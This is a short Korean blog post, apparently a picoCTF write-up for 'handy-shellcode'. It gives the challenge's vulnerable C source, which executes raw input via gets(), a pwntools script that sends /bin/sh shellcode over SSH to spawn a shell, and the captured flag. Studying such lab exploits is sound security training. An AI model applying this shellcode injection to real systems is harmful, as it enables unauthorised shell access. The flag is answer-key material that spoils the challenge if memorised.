ii4gsp
picoCTF - handy-shellcode 본문
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter your shellcode:");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
puts("Finishing Executing Shellcode. Exiting now...");
return 0;
}쉘 코드를 만들어 전달하기만 하면 된다.
from pwn import *
s = ssh(host = '2019shell1.picoctf.com', user = '', password = '')
s.set_working_directory('/problems/handy-shellcode_5_d1b3658f284f442eac06607b8ac4d1f5')
p = s.process('./vuln')
shellcode = asm(shellcraft.i386.linux.sh())
p.sendline(shellcode)
p.interactive()
Flag: picoCTF{h4ndY_d4ndY_sh311c0d3_0b440487}
'시스템 해킹 > CTF' 카테고리의 다른 글
| picoCTF - OverFlow 0 (0) | 2020.03.06 |
|---|---|
| picoCTF - practice-run-1 (0) | 2020.03.06 |
| Angstrom CTF 2019 - Purchases (0) | 2020.03.05 |
| Angstrom CTF 2019 - Pie Shop (0) | 2020.03.04 |
| Angstrom CTF 2019 - Chain of Rope (0) | 2020.03.04 |
'시스템 해킹/CTF' Related Articles
more
Comments